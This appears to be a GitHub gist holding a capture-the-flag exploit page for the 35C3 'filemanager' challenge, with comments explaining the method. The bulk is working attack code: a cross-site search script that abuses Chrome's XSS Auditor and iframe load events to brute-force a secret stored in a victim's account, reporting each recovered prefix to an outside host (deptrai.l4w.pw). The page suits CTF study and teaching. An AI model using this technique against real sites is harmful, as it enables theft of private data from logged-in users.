This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body> | |
| <!-- | |
| Briefly, we all know that flag is stored as `file` in admin account. Plus, the flag is in the format: 35C3_*** | |
| When we searching content of a file, if it does exists, there is a script which doing highlight the found word by yellow <mark> | |
| For example: https://filemanager.appspot.com/search?q=def | |
| <h1>abc</h1> | |
| <pre>def</pre> | |
| <script> | |
| (()=>{ | |
| for (let pre of document.getElementsByTagName('pre')) { | |
| let text = pre.innerHTML; | |
| let q = 'def'; | |
| let idx = text.indexOf(q); | |
| pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`; | |
| } | |
| })(); | |
| </script> | |
| Okay, now let's go to XSS Auditor part. | |
| Try this on Chrome (yea we should, since the description saying that the admin is using Chrome-headless) | |
| view-source:https://filemanager.appspot.com/search?q=def&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b | |
| You can see the red alert, which means that XSS-Auditor found a XSS vector on our URL (`a` param) which also showing in the page's content. But in fact, it's *NOT XSS* , this is side effect of the auditor | |
| We leverage on its mechanism to detect whether there is search result (guessing flag) or not. | |
| * To clarify: `a` is just foo parameter name, we just wanna make XSS-Auditor see it's as XSS vector. | |
| But how do we do that ? Since XSS-Auditor will detect and block the page, redirect the page to `chrome-error://chromewebdata/` as well. | |
| Now the trick comes by. by reading this post: https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning | |
| I found out, it's possible to detect if the browser redirects to other page. | |
| Yep, and that's all. | |
| We can guess the flag by performing XS-Search leverage on XSS-Auditor | |
| --> | |
| <script> | |
| var URL = 'https://filemanager.appspot.com/search?q={{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b'; | |
| var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~'; | |
| var brute = new URLSearchParams(location.search).get('brute') || '35C3_'; | |
| function guess(i){ | |
| var go = brute + charset[i]; | |
| var x = document.createElement('iframe'); | |
| x.name = 'blah'; | |
| var calls = 0; | |
| x.onload = () => { | |
| calls++; | |
| if(calls > 1){ | |
| // so here is calling 2nd onload which means the xss auditor blocking this and the page is redirected to chrome-error:// | |
| // https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning | |
| console.log("GO IT ==> ",go); | |
| location.href = 'http://deptrai.l4w.pw/35c3/go.html?brute='+escape(go); | |
| x.onload = ()=>{}; | |
| } | |
| var anchor = document.createElement('a'); | |
| anchor.target = x.name; | |
| anchor.href = x.src+'#'; | |
| anchor.click(); | |
| anchor = null; | |
| } | |
| x.src = URL.replace('{{search}}',go); | |
| document.body.appendChild(x); | |
| setTimeout(() =>{ | |
| document.body.removeChild(x); | |
| guess(i+1); | |
| },1000); | |
| } | |
| guess(0); | |
| // FLAG: 35C3_xss_auditor_for_the_win | |
| </script> | |
| </body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hic! Pro có thể nói rõ hơn đc không?? :)) Mong đc chỉ giáo :v